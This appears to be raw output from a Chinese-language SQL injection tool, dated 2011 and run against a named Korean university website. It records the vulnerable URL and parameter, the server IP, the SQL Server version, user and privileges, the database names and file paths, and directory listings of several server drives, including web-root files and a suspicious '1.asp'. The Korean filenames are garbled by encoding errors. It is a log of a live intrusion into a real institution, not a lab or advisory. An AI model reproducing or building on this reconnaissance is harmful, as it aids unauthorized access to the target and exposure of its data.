■漏洞信息:============================================================
 ・URL:http://www.dufs.ac.kr/new08/notice.asp?GotoPage=1&block=&part=T_Gongji&pagekind=read&id=1534
 ・页面标题：;;;措备寇惫绢措切;;;
 ・参数:GotoPage=1&block=&part=T_Gongji&pagekind=read&id=1534
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:220.88.242.194
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 04 Apr 2011 05:34:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11775
Content-Type: text/html
Set-Cookie: table=T%5FGongji; path=/
Set-Cookie: ASPSESSIONIDAQQRQQDQ=BKLHCGEAOAOECGFEHADLAEJG; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：daegu
- 用户名：dufs
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：NS
- 服务名：MSSQLSERVER
- 系统用户名：dufs

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
daegu	D:\database\daegu_Data.MDF	
dufs_haksa	D:\database\dufs_haksa_Data.MDF	
haksa01	D:\database\haksa01_Data.MDF	
insa	D:\database\insa_Data.MDF	
master	C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf	
model	C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf	
msdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf	
sn1	D:\database\sn1_Data.MDF	
tempdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
SQLAgent - Generic Refresher	sleeping	NS	1968	AWAITING COMMAND	SYSTEM	
SQLAgent - Alert Engine	sleeping	NS	1968	AWAITING COMMAND	SYSTEM	
SM2007	sleeping	USER-11	3964	AWAITING COMMAND		
SM2007	sleeping	USER-11	3964	AWAITING COMMAND		
SM2007	sleeping	USER-11	3964	AWAITING COMMAND		

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
NS	SQL Server	SQLOLEDB	NS		NS	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of D:: 

切荤辆钦\
切荤FTP\
backup\
database\
ftproot\
iboard\
New_Homepage\
RECYCLER\
System Volume Information\
tools\
ALZ3.tmp
C_傈眉归诀.bkf
gnuboard4.zip
iboard(2).zip
iboard.zip
MegaDoctorSetup.exe

Dir of D:\tools: 

村齿橇饭烙况农\
吝惫ip促瞒窜\
compaq\
SiteGalaxyUpload(2000)\
win2003\
PHP_Setup_for_IIS_v20060119.exe

Dir of D:\database: 

backup\
荤夯 - dufs_haksa_Data.MDF
荤夯 - dufs_haksa_Log.LDF
daegu
daegu_Data.MDF
daegu_Log.LDF
dufs_haksa
dufs_haksa_Data.MDF
dufs_haksa_Log.LDF
haksa01_Data.MDF
haksa01_Log.LDF
insa_Data.MDF
insa_Log.LDF
sn1_Data.MDF
sn1_Log.LDF

Dir of E:: 

compaq\
Documents and Settings\
Inetpub\
Program Files\
RECYCLER\
swsetup\
System Volume Information\
WINDOWS\
wmpub\
AUTOEXEC.BAT
CONFIG.SYS

Dir of F:: 

31543bf706bafc771231\
备切荤\
归诀\
切荤辆钦\
dufs\
iboard\
log\
Microsoft SQL Server\
MSSQLBackup\
New_Homepage\
orant\
RECYCLER\
System Volume Information\
update\
C_傈眉归诀.bkf
New_Homepage(2).zip
New_Homepage.zip

Dir of F:\dufs: 

累诀\
home\
home(2).zip
home.zip

Dir of F:\dufs\home: 
一次性获取失败，正在批次获取……

_notes\
addr\
aspnet_client\
backup\
ckm(ftp)\
contest\
css\
ctis\
ctis1\
ctistest\
depart\
dufs_old\
dufsjob\
dufslife\
entra\
Gongboard\
Gongboard1\
Gongji\
img\
include\
infotest\
interpreter\
intro\
jboard\
library\
life\
mail\
main_link\
new\
newpage\
passer\
patch\
Pict\
popup\
prostudy\
SiteGalaxyUpload(2000)\
Tonggae\
背荐檬葫蜡狼痢.htm
措备寇措 脚巩4瞒 .hwp
措备寇措背荐檬葫.htm
措备寇措脚巩6瞒.hwp
殿废陛咀.frx
荤夯 - main.asp
楷备诀利寒醚褒钎.hwp
烙侩瘤盔辑.hwp
alter.asp
copyright.asp
heige.asp
home.zip
hpclose.html
index.asp
index.htm
index_imsi.asp
index_test.asp
ipsi021211.htm
it_input.jpg
main.asp
main.asp_2岿15老鳖瘤
main.html
main_1.asp
main_menu.asp
main_menu_1.asp
main2.asp
open_01.htm
open_02.htm
open_03.htm
open_04.htm
open_05.htm
open_06.htm
open_06_ok.asp
open_07.htm
open_08.htm
open_09.htm
sql.asp
test.htm
tong.asp
tts.asp

Dir of F:\dufs\累诀: 


■通过读取注册表获取的网站根目录：
Dir of D:\tools\村齿橇饭烙况农: 


Dir of D:\tools\compaq: 

SP24562\
SP24564\

Dir of E:\compaq: 

SP24562\
SP24564\

■正在获取文件属性：
文件名:D:\tools\村齿橇饭烙况农\1.asp

■正在获取文件属性：
文件名:D:\tools\村齿橇饭烙况农\1.asp

